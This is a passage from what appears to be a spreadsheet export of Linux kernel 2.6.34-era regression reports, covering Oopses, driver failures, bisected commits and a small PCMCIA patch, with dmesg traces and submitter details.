(usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; pppd: �k[06][08]�k[06][08]ligent PPP dialer.[0b]Optional SECTION arguments refer to sections in configuration file (usually) --&gt; /etc [01] --&gt; Disconnecting at Tue May 18 12:15:25 2010 --&gt; The PPP daemon has died: A modem hung up the phone (exit code = 16) --&gt; man pppd explains pppd error codes in more detail. --&gt; Try again and look into /var/log/messages and the wvdial and pppd man pages for more information. --&gt; Auto Reconnect will be attempted in 5 seconds --&gt; Cannot get information for serial port. --&gt; Initializing modem. --&gt; Sending: ATZ ATZ OK --&gt; Sending: at+cgdcont=1,"IP","internet.beeline.ru" at+cgdcont=1,"IP","internet.beeline.ru" OK --&gt; Modem initialized. --&gt; Cannot open /dev/rfcomm0: Input/output error 4. Kill wvdial by pressing Ctrl+C 5. Kernel will OOPS with NULL pointer dereference [ 1113.789211] BUG: unable to handle kernel NULL pointer dereference at 00000038 [ 1113.789239] IP: [&lt;c0485dd0&gt;] sock_sendmsg+0xb0/0xf0 [ 1113.789271] *pde = 00000000 [ 1113.789287] Oops: 0000 [#1] SMP [ 1113.789301] last sysfs file: /sys/devices/pci0000:00/0000:00:1c.0/0000:02:00.0/ieee80211/phy0/rfkill1/state [ 1113.789319] Modules linked in: ppp_deflate zlib_deflate bsd_comp ppp_async crc_ccitt ppp_generic slhc i915 drm_kms_helper drm i2c_algo_bit binfmt_misc bridge stp llc bnep rfcomm sco l2cap crc16 sbs sbshc power_meter container acpi_cpufreq cpufreq_userspace cpufreq_stats cpufreq_powersave cpufreq_conservative dm_crypt dm_mod arc4 ecb snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi snd_rawmidi snd_seq_midi_event ath5k snd_seq snd_timer snd_seq_device mac80211 uvcvideo ath snd videodev v4l1_compat video backlight soundcore rtc_cmos cfg80211 intel_agp btusb rtc_core rtc_lib output serio_raw i2c_core evdev processor snd_page_alloc battery joydev ac button pcspkr agpgart bluetooth led_class sg sd_mod ata_generic ata_piix libata scsi_mod ide_pci_generic ehci_hcd sky2 uhci_hcd usbcore thermal fan thermal_sys fuse [ 1113.789648] [ 1113.789668] Pid: 8335, comm: wvdial Not tainted 2.6.34-vanilla #3 NC10 /NC10 [ 1113.789688] EIP: 0060:[&lt;c0485dd0&gt;] EFLAGS: 00210282 CPU: 0 [ 1113.789706] EIP is at sock_sendmsg+0xb0/0xf0 [ 1113.789717] EAX: f2105c30 EBX: 00000000 ECX: f2105d04 EDX: f256ec40 [ 1113.789727] ESI: f2105d04 EDI: f2105c30 EBP: f6640308 ESP: f2105c2c [ 1113.789738] DS: 007b ES: 007b FS: 00d8 GS: 0033 SS: 0068 [ 1113.789751] Process wvdial (pid: 8335, ti=f2104000 task=f2d19560 task.ti=f2104000) [ 1113.789760] Stack: [ 1113.789767] 00000004 c2015450 c201544c 00000000 00000001 ffffffff 00000000 00000000 [ 1113.789790] &lt;0&gt; 00000000 00000000 00000000 f2d19560 00000000 00000000 c014a06b 00000000 [ 1113.789814] &lt;0&gt; f2105ca0 c2015440 f3afc0b8 00200296 f2105cc0 c014a4a5 f3afc0c8 c06d9a04 [ 1113.789841] Call Trace: [ 1113.789861] [&lt;c014a06b&gt;] ? insert_work+0x7b/0x90 [ 1113.789877] [&lt;c014a4a5&gt;] ? __queue_work+0x25/0x40 [ 1113.789892] [&lt;c0140ef8&gt;] ? run_timer_softirq+0x168/0x270 [ 1113.789910] [&lt;c0179754&gt;] ? __rcu_process_callbacks+0x44/0x2b0 [ 1113.789925] [&lt;c01799f3&gt;] ? rcu_process_callbacks+0x33/0x40 [ 1113.789941] [&lt;c01399c3&gt;] ? __do_softirq+0x103/0x180 [ 1113.789955] [&lt;c0485e3f&gt;] ? kernel_sendmsg+0x2f/0x50 [ 1113.789980] [&lt;f85d412a&gt;] ? rfcomm_send_frame+0x3a/0x40 [rfcomm] [ 1113.790001] [&lt;f85d4188&gt;] ? rfcomm_send_disc+0x58/0x60 [rfcomm] [ 1113.790020] [&lt;f85d480a&gt;] ? __rfcomm_dlc_close+0x1fa/0x230 [rfcomm] [ 1113.790026] [&lt;c01d47d8&gt;] ? fasync_helper+0x28/0x110 [ 1113.790026] [&lt;f85d4d51&gt;] ? rfcomm_dlc_close+0x21/0x40 [rfcomm] [ 1113.790026] [&lt;f85d8d23&gt;] ? rfcomm_tty_close+0x43/0x180 [rfcomm] [ 1113.790026] [&lt;c0427694&gt;] ? tty_release+0x174/0x600 [ 1113.790026] [&lt;f85d90b9&gt;] ? rfcomm_tty_open+0x259/0x370 [rfcomm] [ 1113.790026] [&lt;c012f190&gt;] ? default_wake_function+0x0/0x10 [ 1113.790026] [&lt;c0428382&gt;] ? tty_open+0x512/0x590 [ 1113.790026] [&lt;c01cb316&gt;] ? chrdev_open+0x126/0x1d0 [ 1113.790026] [&lt;c01c67a5&gt;] ? __dentry_open+0xf5/0x2b0 [ 1113.790026] [&lt;c01d0627&gt;] ? generic_permission+0x17/0xb0 [ 1113.790026] [&lt;c01c6a47&gt;] ? nameidata_to_filp+0x47/0x50 [ 1113.790026] [&lt;c01cb1f0&gt;] ? chrdev_open+0x0/0x1d0 [ 1113.790026] [&lt;c01d24d7&gt;] ? do_last+0x397/0x630 [ 1113.790026] [&lt;c01d43a4&gt;] ? do_filp_open+0x1d4/0x560 [ 1113.790026] [&lt;c01d38ed&gt;] ? do_unlinkat+0x4d/0x160 [ 1113.790026] [&lt;c01c651d&gt;] ? do_sys_open+0x6d/0x140 [ 1113.790026] [&lt;c01c666c&gt;] ? sys_open+0x2c/0x40 [ 1113.790026] [&lt;c0102bd0&gt;] ? sysenter_do_call+0x12/0x26 [ 1113.790026] Code: 44 24 30 00 00 00 00 c7 44 24 34 00 00 00 00 c7 84 24 8c 00 00 00 00 00 00 00 89 b4 24 90 00 00 00 8b 58 24 89 f8 89 0c 24 89 f1 &lt;ff&gt; 53 38 3d ef fd ff ff 74 1e 8b 9c 24 b4 00 00 00 8b b4 24 b8 [ 1113.790026] EIP: [&lt;c0485dd0&gt;] sock_sendmsg+0xb0/0xf0 SS:ESP 0068:f2105c2c [ 1113.790026] CR2: 0000000000000038 [ 1113.790548] ---[ end trace a45d69946fff6e7a ]--- After some investigation I have found that after reverting commit 9e726b17422bade75fba94e625cd35fd1353e682 kernel Oopses are gone and wvdial starts working as expected (reconnects when device goes back in range or exit after some timeout expired and device did not go back) Patch included.</t>
  </si>
  <si>
    <t>ioremap error with radeon (KMS)</t>
  </si>
  <si>
    <t>2010-05-19 21:09 UTC</t>
  </si>
  <si>
    <t>2010-06-13 13:54 UTC</t>
  </si>
  <si>
    <t>Created attachment 26441 [details] dmesg output When booting with 2.6.34, the initialisation of the radeon hd3470 GPU of my laptop fail with this trace (I'll attach the full dmesg output): [ 19.332986] WARNING: at arch/x86/mm/ioremap.c:111 __ioremap_caller+0x162/0x2fc() [ 19.332988] Hardware name: M51SE [ 19.332989] Modules linked in: radeon(+) ttm drm_kms_helper drm i2c_algo_bit ipv6 loop snd_hda_codec_realtek snd_hda_intel snd_hda_codec snd_hwdep tpm_infineon joydev snd_pcm_oss snd_mixer_oss snd_pcm snd_seq_dummy snd_seq_oss snd_seq_midi btusb snd_rawmidi arc4 snd_seq_midi_event uvcvideo bluetooth snd_seq ecb videodev v4l1_compat v4l2_compat_ioctl32 iwlagn i2c_core video rtc_cmos snd_timer psmouse tpm_tis iwlcore snd_seq_device mac80211 snd cfg80211 asus_laptop output tpm rtc_core soundcore evdev sparse_keymap rtc_lib tpm_bios ac battery rfkill pcspkr button serio_raw processor snd_page_alloc ext4 mbcache jbd2 crc16 dm_mod ide_cd_mod cdrom sd_mod ata_generic ata_piix ide_pci_generic sdhci_pci sdhci uhci_hcd mmc_core ahci thermal piix atl1 ohci1394 led_class ieee1394 libata thermal_sys scsi_mod mii ide_core ehci_hcd intel_agp [last unloaded: scsi_wait_scan] [ 19.333057] Pid: 1481, comm: modprobe Not tainted 2.6.34 #1 [ 19.333058] Call Trace: [ 19.333066] [&lt;ffffffff81030f1b&gt;] ? warn_slowpath_common+0x76/0x8c [ 19.333068] [&lt;ffffffff8101f1fe&gt;] ? __ioremap_caller+0x162/0x2fc [ 19.333119] [&lt;ffffffffa0450514&gt;] ? igp_read_bios_from_vram+0x2c/0x85 [radeon] [ 19.333140] [&lt;ffffffffa045060c&gt;] ? radeon_get_bios+0x16/0x16f2 [radeon] [ 19.333159] [&lt;ffffffffa0472b29&gt;] ? r600_init+0x4d/0x2c8 [radeon] [ 19.333175] [&lt;ffffffffa042f046&gt;] ? radeon_device_init+0x2c0/0x33b [radeon] [ 19.333191] [&lt;ffffffffa042fdf6&gt;] ? radeon_driver_load_kms+0xb2/0x134 [radeon] [ 19.333203] [&lt;ffffffffa03e966b&gt;] ? drm_get_dev+0x341/0x44e [drm] [ 19.333209] [&lt;ffffffff81155889&gt;] ? local_pci_probe+0x12/0x16 [ 19.333212] [&lt;ffffffff811564e3&gt;] ? pci_device_probe+0xbf/0xec [ 19.333218] [&lt;ffffffff811c06db&gt;] ? driver_sysfs_add+0x42/0x69 [ 19.333218] [&lt;ffffffff811c07fd&gt;] ? driver_probe_device+0x8e/0x10e [ 19.333221] [&lt;ffffffff811c08cc&gt;] ? __driver_attach+0x4f/0x6f [ 19.333223] [&lt;ffffffff811c087d&gt;] ? __driver_attach+0x0/0x6f [ 19.333228] [&lt;ffffffff811c00f3&gt;] ? bus_for_each_dev+0x44/0x78 [ 19.333231] [&lt;ffffffff811bfad8&gt;] ? bus_add_driver+0xaf/0x1f7 [ 19.333233] [&lt;ffffffff811c0b61&gt;] ? driver_register+0x90/0xf8 [ 19.333236] [&lt;ffffffff8115672b&gt;] ? __pci_register_driver+0x4e/0xc0 [ 19.333249] [&lt;ffffffffa04bb000&gt;] ? radeon_init+0x0/0xc0 [radeon] [ 19.333261] [&lt;ffffffffa04bb000&gt;] ? radeon_init+0x0/0xc0 [radeon] [ 19.333264] [&lt;ffffffff810001e0&gt;] ? do_one_initcall+0x4f/0x13e [ 19.333269] [&lt;ffffffff81057905&gt;] ? sys_init_module+0xc6/0x221 [ 19.333272] [&lt;ffffffff810028ab&gt;] ? system_call_fastpath+0x16/0x1b Please, note that this laptop may have a buggy hardware. In 2008, I reported bug #11103 (that have been solved since): I couldn't use my laptop video card with two 2GiB memory modules. Here again, with one module it works fine, with two modules it fails. Note, that there is no problem with kernel 2.6.33.4 (hence I marked it as a regression). I can test patches or do a git bisect search if you think it could be useful. Sincerely, Yannick PS: Yinghai, I CCed you as you solved the problem last time.</t>
  </si>
  <si>
    <t>[Regression] `mount --bind` no longer works with files in 2.6.34</t>
  </si>
  <si>
    <t>2010-05-20 12:53 UTC</t>
  </si>
  <si>
    <t>2010-06-13 11:40 UTC</t>
  </si>
  <si>
    <t>In 2.6.34-rc7 `mount --bind` worked fine with both directories and files but in 2.6.34 it no longer works with files. Version: vanilla 2.6.34 kernel, compiled with gcc 4.4.4 (gcc version 4.4.4 20100514 (Red Hat 4.4.4-3)) Steps to reproduce: 1. $ echo 'asd' &gt; file1 2. $ touch file2 3. $ mount --bind file1 file2 I bisected 2.6.34-rc7 (good) and 2.6.34 (bad) kernels and I've found commit which caused this regression. It's: commit d83c49f3e36cecd2e8823b6c48ffba083b8a5704 Author: Al Viro &lt;viro@zeniv.linux.org.uk&gt; Date: Fri Apr 30 17:17:09 2010 -0400 Fix the regression created by "set S_DEAD on unlink()..." commit Feel free to ask me if you need more information.</t>
  </si>
  <si>
    <t>yenta_socket.c  broken wireless cards.</t>
  </si>
  <si>
    <t>2010-05-20 13:26 UTC</t>
  </si>
  <si>
    <t>Justin P. Mattock</t>
  </si>
  <si>
    <t>2010-06-13 13:25 UTC</t>
  </si>
  <si>
    <t>I've sent this out to the appropriate lists, but received no response (I don't have the time to sit and wait around for people who can figure out how todo their jobs) Anyways here is the patch/bisection: I've an old dell inspiron 1200(amazingly still works), that use's a D-Link DWL-G650, and/or a Dell Wireless 1350 for it's wireless connection. With using opensuse11.2(kernel:2.6.32*), the card(s) work fine, but as soon as I pulled the latest HEAD, all hell broke loose. So after doing a days worth of bisecting with this machine(painfully slow), it finally came down to this commit: commit 28ca8dd71fc170090edca62cb8129625d01b7760 Author: Jens K&lt;C3&gt;&lt;BC&gt;nzer &lt;Jens.Kuenzer@fpga.homeip.net&gt; Date: Sat Mar 6 07:46:16 2010 +0100 pcmcia: honor saved flags in yenta_socket's I365_CSCINT register Instead of overwriting the I365_CSCINT register, save the old value and merely change the bits we care about. Part 1 of a series to allow the ISA irq to be used for Cardbus devices if the socket's PCI irq is unusable. [linux@dominikbrodowski.net: split up the original patch, commit message] Signed-off-by: Jens Kuenzer &lt;Jens.Kuenzer@fpga.homeip.net&gt; Signed-off-by: Dominik Brodowski &lt;linux@dominikbrodowski.net&gt; so after fussing around with this commit, and yenta_socket.c I come up with something, that does get my cards powered up, and all good(hopefully). Anyways please have a look, if you need me to test something different let me know. Signed-off-by: Justin P. Mattock &lt;justinmattock@gmail.com&gt; --- drivers/pcmcia/yenta_socket.c | 2 +- 1 files changed, 1 insertions(+), 1 deletions(-) diff --git a/drivers/pcmcia/yenta_socket.c b/drivers/pcmcia/yenta_socket.c index 83ace27..7d6f43b 100644 --- a/drivers/pcmcia/yenta_socket.c +++ b/drivers/pcmcia/yenta_socket.c @@ -989,7 +989,7 @@ static int yenta_probe_cb_irq(struct yenta_socket *socket) } /* generate interrupt, wait */ - reg = exca_readb(socket, I365_CSCINT); + reg = exca_readb(socket, I365_CSCINT | I365_CSC_ANY); exca_writeb(socket, I365_CSCINT, reg | I365_CSC_STSCHG); cb_writel(socket, CB_SOCKET_EVENT, -1); cb_writel(socket, CB_SOCKET_MASK, CB_CSTSMASK); -- 1.6.5.2.180.gc5b3e</t>
  </si>
  <si>
    <t>TFP410 driver should use RSEN bit to detect presence of a digital monitor</t>
  </si>
  <si>
    <t>2.6.29 - 2.6.34</t>
  </si>
  <si>
    <t>2010-05-22 08:29 UTC</t>
  </si>
  <si>
    <t>2010-08-08 17:14 UTC</t>
  </si>
  <si>
    <t>Created attachment 26495 [details] Patch against linux-2.6.34 to use RSEN instead of HTPLG as monitor present indicator Presence detection of a digital monitor seems not to be reliable using the HTPLG bit, so use the RSEN bit instead. As the original Xorg code suffers from the same problem, this "bug" is present in a kernels since this inclusion of the Xorg code into the Linux kernel (somewhere around 2.6.29, i think).</t>
  </si>
  <si>
    <t>Failed to receive control of PCIe PME service: ACPI _OSC failed</t>
  </si>
  <si>
    <t>2010-05-22 12:49 UTC</t>
  </si>
  <si>
    <t>Atanas Zhelev</t>
  </si>
  <si>
    <t>2010-09-29 02:10 UTC</t>
  </si>
  <si>
    <t>Hello, Latest working kernel version: 2.6.33.4 Earliest failing kernel version: 2.6.34 Distribution: ArchLinux x86_64, kernel is from distro repository but only has 2 patches for aufs2 Hardware Environment: dell studio xps 1647 Problem Description: When booting the latest kernel i see those error messages in dmesg. Kernel 2.6.33.x does not show such problem. pcieport 0000:00:01.0: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:01.0: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:01.0:pcie01 failed with error -13 pcieport 0000:00:1c.0: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:1c.0: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:1c.0:pcie01 failed with error -13 pcieport 0000:00:1c.1: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:1c.1: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:1c.1:pcie01 failed with error -13 pcieport 0000:00:1c.3: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:1c.3: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:1c.3:pcie01 failed with error -13 pcieport 0000:00:1c.4: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:1c.4: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:1c.4:pcie01 failed with error -13 pcieport 0000:00:1c.5: Requesting control of PCIe PME from ACPI BIOS \_SB_.PCI0:_OSC invalid UUID _OSC request data:1 0 1f pcieport 0000:00:1c.5: Failed to receive control of PCIe PME service: ACPI _OSC failed pcie_pme: probe of 0000:00:1c.5:pcie01 failed with error -13 Steps to reproduce: boot, check dmesg</t>
  </si>
  <si>
    <t>2.6.34: dlm: possible circular locking dependency detected</t>
  </si>
  <si>
    <t>ocfs2</t>
  </si>
  <si>
    <t>2010-05-23 06:33 UTC</t>
  </si>
  <si>
    <t>2010-07-09 23:26 UTC</t>
  </si>
  <si>
    <t>fs_ocfs2</t>
  </si>
  <si>
    <t>Subject : 2.6.34: dlm: possible circular locking dependency detected Submitter : CaT &lt;cat@zip.com.au&gt; Date : 2010-05-21 6:59 Message-ID : 20100521065933.GH2657@zip.com.au References : http://marc.info/?l=linux-kernel&amp;m=127442519608471&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Incorrect initial resolution of (external) vga monitor with KMS</t>
  </si>
  <si>
    <t>2010-05-23 12:28 UTC</t>
  </si>
  <si>
    <t>Andreas Eckstein</t>
  </si>
  <si>
    <t>2010-08-03 12:25 UTC</t>
  </si>
  <si>
    <t>Thinkpad T43, i915 graphics Kernel 2.6.34 Xorg-server 1.8.1 xf86-video-intel 2.11.0 Initial console after booting has the resolution of the laptop's display at 1024x768 instead of the monitor's 1680x1050, using the top left corner of the screen. When X starts, it uses a scaled-up 1024x768 resolution. I saw this behavior when KMS became part of the kernel (2.6.29 I think) but it was fixed a few versions later (perhaps 2.6.31).</t>
  </si>
  <si>
    <t>NULL Pointer dereference in __ir_input_register/budget_ci_attach</t>
  </si>
  <si>
    <t>v2.6.34-7098-g80050ff</t>
  </si>
  <si>
    <t>2010-05-23 19:52 UTC</t>
  </si>
  <si>
    <t>Sean Finney</t>
  </si>
  <si>
    <t>2010-06-09 08:59 UTC</t>
  </si>
  <si>
    <t>Created attachment 26511 [details] the BUG() trace Hi, it looks like the merge from fb091be08d1acf184e8801dfdcace6e0cb19b1fe has introduced a regression, when the ttpci module is loaded at boot up a get a kernel BUG() about null pointer derferencing. info attached. i've been riding latest from git for the past couple weeks but only saw this in the past week or so, so i'm strongly suspecting that it came from the above mentioned commit. i believe others have seen this too: http://article.gmane.org/gmane.linux.drivers.video-input-infrastructure/19494/match=</t>
  </si>
  <si>
    <t>kacpid consumes ~40% of cpu all the time beginning with 2.6.34</t>
  </si>
  <si>
    <t>2010-05-24 07:32 UTC</t>
  </si>
  <si>
    <t>Mehmet Giritli</t>
  </si>
  <si>
    <t>2010-06-27 21:39 UTC</t>
  </si>
  <si>
    <t>Created attachment 26515 [details] dmesg Hi, I am attaching dmesg from my laptop (Toshiba A350-22Z) where I have kacpid consuming around 40% of my cpu continuously. This did not happen with any of the kernels prior to 2.6.34 before, it is the first time I am seeing such a thing on my laptop. Please let me know of any further data that you might need.</t>
  </si>
  <si>
    <t>Resume w/USB remote working in 2.6.33.2, no longer in 2.6.33.10</t>
  </si>
  <si>
    <t>2.6.33.10</t>
  </si>
  <si>
    <t>2010-05-25 03:51 UTC</t>
  </si>
  <si>
    <t>Scott Sturdivant</t>
  </si>
  <si>
    <t>Using the latest Arch Linux kernel (2.6.33.10-1), the contents of /proc/acpi/wakeup are: [scott@blargh-htpc ~]$ cat /proc/acpi/wakeup Device S-state Status Sysfs node HUB0 S5 disabled pci:0000:00:09.0 XVR0 S5 disabled XVR1 S5 disabled XVR2 S5 disabled XVR3 S5 disabled XVR4 S5 disabled pci:0000:00:16.0 XVR5 S5 disabled XVR6 S5 disabled UAR1 S5 disabled pnp:00:08 USB0 S4 enabled pci:0000:00:04.0 USB1 S4 disabled pci:0000:00:06.0 USBB S3 disabled pci:0000:00:06.1 USB2 S3 disabled pci:0000:00:04.1 AZAD S5 disabled pci:0000:00:08.0 MMAC S5 disabled pci:0000:00:0a.0 [scott@blargh-htpc pkg]$ uname -a Linux blargh-htpc 2.6.33-ARCH #1 SMP PREEMPT Thu May 13 11:32:37 CEST 2010 x86_64 Intel(R) Core(TM)2 Duo CPU E8400 @ 3.00GHz GenuineIntel GNU/Linu x The machine will suspend to RAM correctly, but will no longer be resumed by a USB remote power-on event. Instead, the power button on the machine must be pressed. It then resumes correctly. This behavior was not present in the previous kernel I was running: 2.6.33.2-1. In that case, the machine powered back on correctly when the USB remote's power button was pressed. There was an intermediate kernel release (2.6.33.4-1) that I have not tried, but certainly can do so if that might help determine where the regression was introduced. Additionally if there's more information I can provide about the system and my setup, please let me know what is required.</t>
  </si>
  <si>
    <t>one core is always at 100% while the others at less than 5%</t>
  </si>
  <si>
    <t>2.6.34-git9</t>
  </si>
  <si>
    <t>2010-05-26 13:16 UTC</t>
  </si>
  <si>
    <t>Andrew</t>
  </si>
  <si>
    <t>2010-06-08 21:58 UTC</t>
  </si>
  <si>
    <t>After compiling with a known good config, a kernel with the git9 patch applied to the 2.6.34 source on an AMD Phenom 9500 will use 100% of one core at idle ( and all other times.) Steps to reproduce: 1) compile .34 with git9 patch or linux-next-20100525 2) reboot Actual results: one core pegged at 100% Expected results: all four cores 0% at idle Does not occur with 2.6.34</t>
  </si>
  <si>
    <t>UML broken for CONFIG_SLAB</t>
  </si>
  <si>
    <t>2010-05-26 19:18 UTC</t>
  </si>
  <si>
    <t>2010-07-09 22:30 UTC</t>
  </si>
  <si>
    <t>Subject : UML broken for CONFIG_SLAB Submitter : Parag Warudkar &lt;parag.lkml@gmail.com&gt; Date : 2010-05-23 21:40 Message-ID : alpine.DEB.2.00.1005231149100.605@parag-laptop References : http://marc.info/?l=linux-kernel&amp;m=127465083806617&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>Crashes / traces after copying large files over NFS</t>
  </si>
  <si>
    <t>2.6.32.12</t>
  </si>
  <si>
    <t>2010-05-26 20:26 UTC</t>
  </si>
  <si>
    <t>Leszek Urbanski</t>
  </si>
  <si>
    <t>2010-08-06 18:02 UTC</t>
  </si>
  <si>
    <t>Created attachment 26552 [details] dmesg immediately after failure Arch: amd64, NFS v3 client. When copying a large file (larger than the amount of available physical memory) to an NFS-mounted filesystem, swapper and rpciod on the client complain about page allocation failures and then kswapd goes into a deadlock, resulting in a system-wide crash. Filed as a new bug at Trond Myklebust's request from #15578. Stack traces attached, including dmesg contents immediately after failure (the trace triggered from sysrq and read with dmesg -s 900000 seems not to cover everything).</t>
  </si>
  <si>
    <t>[Regression][git head f4b87dee9] ath9k doesn't work correctly after resume from suspend to RAM</t>
  </si>
  <si>
    <t>2010-05-27 18:40 UTC</t>
  </si>
  <si>
    <t>2010-05-27 19:43 UTC</t>
  </si>
  <si>
    <t>Subject : [Regression][git head f4b87dee9] ath9k doesn't work correctly after resume from suspend to RAM Submitter : "Rafael J. Wysocki" &lt;rjw@sisk.pl&gt; Date : 2010-05-22 21:53 Message-ID : 201005222353.26920.rjw@sisk.pl References : http://marc.info/?l=linux-kernel&amp;m=127456516225238&amp;w=2 This entry is being used for tracking a regression from 2.6.34. Please don't close it until the problem is fixed in the mainline. Caused by: commit 03ceedea972a82d343fa5c2528b3952fa9e615d5 Author: Daniel Yingqiang Ma &lt;yma.cool@gmail.com&gt; Date: Tue Apr 13 15:12:07 2010 +0800 ath9k: Group Key fix for VAPs First-Bad-Commit : 03ceedea972a82d343fa5c2528b3952fa9e615d5</t>
  </si>
  <si>
    <t>host panic on kernel 2.6.34</t>
  </si>
  <si>
    <t>2010-05-31 15:51 UTC</t>
  </si>
  <si>
    <t>2010-08-01 14:03 UTC</t>
  </si>
  <si>
    <t>Subject : host panic on kernel 2.6.34 Submitter : "Hao, Xudong" &lt;xudong.hao@intel.com&gt; Date : 2010-05-24 8:23 Message-ID : BC00F5384FCFC9499AF06F92E8B78A9E04DCCCE242@shsmsx502.ccr.corp.intel.com References : http://marc.info/?l=linux-kernel&amp;m=127468951208864&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>iwl3945 bug in 2.6.34</t>
  </si>
  <si>
    <t>2010-05-31 17:34 UTC</t>
  </si>
  <si>
    <t>2010-06-29 09:13 UTC</t>
  </si>
  <si>
    <t>Subject : iwl3945 bug in 2.6.34 Submitter : Satish Eerpini &lt;eerpini@gmail.com&gt; Date : 2010-05-23 6:37 Message-ID : AANLkTik_7rxDBc0TKlAfoYyM5S6Cf_Hyxbr4W5ORnTsq@mail.gmail.com References : http://marc.info/?l=linux-kernel&amp;m=127459596015626&amp;w=2 This entry is being used for tracking a regression from 2.6.33. Please don't close it until the problem is fixed in the mainline.</t>
  </si>
  <si>
    <t>sysfs: cannot create duplicate filename</t>
  </si>
  <si>
    <t>2.6.35-rc1</t>
  </si>
  <si>
    <t>2010-06-01 15:59 UTC</t>
  </si>
  <si>
    <t>2010-06-21 18:53 UTC</t>
  </si>
  <si>
    <t>No idea what I am looking at here, but I spot sysfs. [ 2.654836] ------------[ cut here ]------------ [ 2.654846] WARNING: at fs/sysfs/dir.c:451 sysfs_add_one+0xc5/0x130() [ 2.654848] Hardware name: MacBook2,1 [ 2.654850] sysfs: cannot create duplicate filename '/devices/pci0000:00/0000:00:1c.1/0000:02:00.0/slot' [ 2.654852] Modules linked in: [ 2.654856] Pid: 1, comm: swapper Not tainted 2.6.35-rc1 #1 [ 2.654858] Call Trace: [ 2.654866] [&lt;ffffffff8108a8aa&gt;] warn_slowpath_common+0x7a/0xb0 [ 2.654870] [&lt;ffffffff8108a981&gt;] warn_slowpath_fmt+0x41/0x50 [ 2.654873] [&lt;ffffffff811c80e5&gt;] sysfs_add_one+0xc5/0x130 [ 2.654877] [&lt;ffffffff811c878b&gt;] sysfs_do_create_link+0x13b/0x190 [ 2.654881] [&lt;ffffffff811c87fe&gt;] sysfs_create_link+0xe/0x10 [ 2.654886] [&lt;ffffffff81480706&gt;] pci_create_sysfs_dev_files+0x3d6/0x5f0 [ 2.654891] [&lt;ffffffff82624db8&gt;] ? pci_sysfs_init+0x0/0x51 [ 2.654894] [&lt;ffffffff82624db8&gt;] ? pci_sysfs_init+0x0/0x51 [ 2.654897] [&lt;ffffffff82624dd7&gt;] pci_sysfs_init+0x1f/0x51 [ 2.654900] [&lt;ffffffff82624b94&gt;] ? pci_resource_alignment_sysfs_init+0x0/0x19 [ 2.654905] [&lt;ffffffff81002047&gt;] do_one_initcall+0x37/0x1a0 [ 2.654910] [&lt;ffffffff825f977c&gt;] kernel_init+0x171/0x1fb [ 2.654915] [&lt;ffffffff8103bd24&gt;] kernel_thread_helper+0x4/0x10 [ 2.654919] [&lt;ffffffff825f960b&gt;] ? kernel_init+0x0/0x1fb [ 2.654923] [&lt;ffffffff8103bd20&gt;] ? kernel_thread_helper+0x0/0x10 [ 2.654926] ---[ end trace 273ba1e8361c6959 ]--- 00:00.0 Host bridge: Intel Corporation Mobile 945GM/PM/GMS, 943/940GML and 945GT Express Memory Controller Hub (rev 03) 00:02.0 VGA compatible controller: Intel Corporation Mobile 945GM/GMS, 943/940GML Express Integrated Graphics Controller (rev 03) 00:02.1 Display controller: Intel Corporation Mobile 945GM/GMS/GME, 943/940GML Express Integrated Graphics Controller (rev 03) 00:07.0 Performance counters: Intel Corporation Device 27a3 (rev 03) 00:1b.0 Audio device: Intel Corporation 82801G (ICH7 Family) High Definition Audio Controller (rev 02) 00:1c.0 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 1 (rev 02) 00:1c.1 PCI bridge: Intel Corporation 82801G (ICH7 Family) PCI Express Port 2 (rev 02) 00:1d.0 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #1 (rev 02) 00:1d.1 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #2 (rev 02) 00:1d.2 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #3 (rev 02) 00:1d.3 USB Controller: Intel Corporation 82801G (ICH7 Family) USB UHCI Controller #4 (rev 02) 00:1d.7 USB Controller: Intel Corporation 82801G (ICH7 Family) USB2 EHCI Controller (rev 02) 00:1e.0 PCI bridge: Intel Corporation 82801 Mobile PCI Bridge (rev e2) 00:1f.0 ISA bridge: Intel Corporation 82801GBM (ICH7-M) LPC Interface Bridge (rev 02) 00:1f.1 IDE interface: Intel Corporation 82801G (ICH7 Family) IDE Controller (rev 02) 00:1f.2 IDE interface: Intel Corporation 82801GBM/GHM (ICH7 Family) SATA IDE Controller (rev 02) 00:1f.3 SMBus: Intel Corporation 82801G (ICH7 Family) SMBus Controller (rev 02) 01:00.0 Ethernet controller: Marvell Technology Group Ltd. 88E8053 PCI-E Gigabit Ethernet Controller (rev 22) 02:00.0 Network controller: Atheros Communications Inc. AR5008 Wireless Network Adapter (rev 01) 03:03.0 FireWire (IEEE 1394): Agere Systems FW322/323 (rev 61)</t>
  </si>
